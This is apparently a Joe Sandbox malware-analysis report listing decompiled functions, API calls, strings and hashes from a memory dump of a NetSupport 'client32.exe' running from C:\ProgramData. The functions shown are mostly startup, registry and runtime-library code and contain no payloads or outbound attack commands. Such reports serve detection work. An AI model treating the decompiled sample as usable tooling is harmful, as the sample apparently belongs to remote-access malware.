Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3804766296-4122679463
Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00211020 Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				struct _STARTUPINFOA _v72;
				char _t11;
				char _t12;
				signed int _t14;
				int _t16;
				intOrPtr _t17;
				char* _t18;

				_t18 = GetCommandLineA();
				_t11 =  *_t18;
				if(_t11 != 0x22) {
					if(_t11 <= 0x20) {
						L9:
						_t12 =  *_t18;
						if(_t12 == 0) {
							L12:
							_v72.dwFlags = 0;
							GetStartupInfoA( &_v72);
							_t14 = _v72.wShowWindow & 0x0000ffff;
							if((_v72.dwFlags & 0x00000001) == 0) {
								_t14 = 0xa;
							}
							_t16 = E00211000(GetModuleHandleA(0), 0, _t18, _t14); // executed
							ExitProcess(_t16);
						}
						while(_t12 <= 0x20) {
							_t12 =  *((intOrPtr*)(_t18 + 1));
							_t18 = _t18 + 1;
							if(_t12 != 0) {
								continue;
							}
							goto L12;
						}
						goto L12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t18 = _t18 + 1;
					} while ( *_t18 > 0x20);
					goto L9;
				}
				_t17 =  *((intOrPtr*)(_t18 + 1));
				_t18 = _t18 + 1;
				if(_t17 == 0) {
					L5:
					if( *_t18 != 0x22) {
						goto L9;
					}
					L6:
					_t18 = _t18 + 1;
					goto L9;
				}
				while(_t17 != 0x22) {
					_t17 =  *((intOrPtr*)(_t18 + 1));
					_t18 = _t18 + 1;
					if(_t17 != 0) {
						continue;
					}
					goto L5;
				}
				goto L6;
			}

0x0021102d
0x0021102f
0x00211033
0x00211056
0x0021105e
0x0021105e
0x00211062
0x00211070
0x00211074
0x0021107b
0x00211085
0x00211089
0x0021108b
0x0021108b
0x0021109d
0x002110a3
0x002110a3
0x00211064
0x00211068
0x0021106b
0x0021106e
0x00000000
0x00000000
0x00000000
0x0021106e
0x00000000
0x00000000
0x00000000
0x00000000
0x00211058
0x00211058
0x00211058
0x00211059
0x00000000
0x00211058
0x00211035
0x00211038
0x0021103b
0x0021104c
0x0021104f
0x00000000
0x00000000
0x00211051
0x00211051
0x00000000
0x00211051
0x00211040
0x00211044
0x00211047
0x0021104a
0x00000000
0x00000000
0x00000000
0x0021104a
0x00000000

APIs

GetCommandLineA.KERNEL32 ref: 00211027
GetStartupInfoA.KERNEL32(?), ref: 0021107B
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00211096
ExitProcess.KERNEL32 ref: 002110A3

Memory Dump Source

Source File: 00000012.00000002.1074256744.0000000000211000.00000020.00000001.01000000.00000008.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1074249169.0000000000210000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_client32.jbxd

Yara matches

Similarity

API ID: CommandExitHandleInfoLineModuleProcessStartup
String ID:
API String ID: 2164999147-0
Opcode ID: f88b188aa7bfe3a7077533f776da8a0e59f45ba31711134e1603d4e767724d74
Instruction ID: a01ad086df00a823b7a0b42f802279d1d75ab7b4dc9631512ee3f602ce21252b
Opcode Fuzzy Hash: f88b188aa7bfe3a7077533f776da8a0e59f45ba31711134e1603d4e767724d74
Instruction Fuzzy Hash: 2B110420C143D69AEB719F6088487EABFE59F3E380F244044EED696146C67248FBC7A4

Uniqueness

Uniqueness Score: -1.00%

Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110092E5
_memmove.LIBCMT ref: 11009336

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

string too long, xrefs: 110092E0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 111447F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\client32.exe,00000104,?,11144A43,?), ref: 11144819

Strings

C:\ProgramData\client32.exe, xrefs: 11144804, 11144812

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\ProgramData\client32.exe
API String ID: 2251294070-150581669
Opcode ID: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
Opcode Fuzzy Hash: 4bd13d76f1b20cdb1905744e884daa295da0da760e6d1ff5c5a6e9fc06adbb17
Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780

Uniqueness

Uniqueness Score: -1.00%

Function 11110230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 11110239

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

_memset.LIBCMT ref: 11110262

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\ctl32\Refcount.cpp, xrefs: 1111024C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
String ID: ..\ctl32\Refcount.cpp
API String ID: 2803934178-2363596943
Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6

Uniqueness

Uniqueness Score: -1.00%

Function 11015580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 11015597
CloseHandle.KERNEL32(00000000), ref: 110155A8

Strings

\\.\NSWFPDrv, xrefs: 11015592

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0

Uniqueness

Uniqueness Score: -1.00%

Function 1115CCA0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1115CCC3

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 11008100 Relevance: 4.6, APIs: 3, Instructions: 113COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 11008199

Part of subcall function 1116305A: std::exception::_Copy_str.LIBCMT ref: 11163075

__CxxThrowException@8.LIBCMT ref: 110081AE

Part of subcall function 111634B1: RaiseException.KERNEL32(?,?,11110E64,?,?,?,?,?,11110E64,?,111CD988), ref: 111634F3

Part of subcall function 110D35C0: std::exception::exception.LIBCMT ref: 110D35EF
Part of subcall function 110D35C0: __CxxThrowException@8.LIBCMT ref: 110D3604

_memmove.LIBCMT ref: 110081F5

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID:
API String ID: 163498487-0
Opcode ID: 53616c1f78c3e64ca66f76ac878d102f10185fa44eb35061f328d8bf252775aa
Instruction ID: c28380fa9ee863ca14df48cc07272fc843836bb101cae3189942bdcbb2b8dc28
Opcode Fuzzy Hash: 53616c1f78c3e64ca66f76ac878d102f10185fa44eb35061f328d8bf252775aa
Instruction Fuzzy Hash: B841A475E00606ABD704CF68C8807DEFBF8FF05264F50466AE916A7380E775AA50CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111F1908,0CBC1010,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
EnterCriticalSection.KERNEL32(111F1908,0CBC1010,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d Opening regkey %s, xrefs: 110ED54A

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED

Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB

Strings

Error %d closing regkey %x, xrefs: 110ED4FD

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewvsprintf
String ID: Error %d closing regkey %x
API String ID: 843752472-892920262
Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764

Uniqueness

Uniqueness Score: -1.00%

Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(nslsp.dll), ref: 1101553E

Strings

nslsp.dll, xrefs: 11015533

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: nslsp.dll
API String ID: 1029625771-3933918195
Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80

Uniqueness

Uniqueness Score: -1.00%

Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 110608C3
__CxxThrowException@8.LIBCMT ref: 110608D8

Memory Dump Source

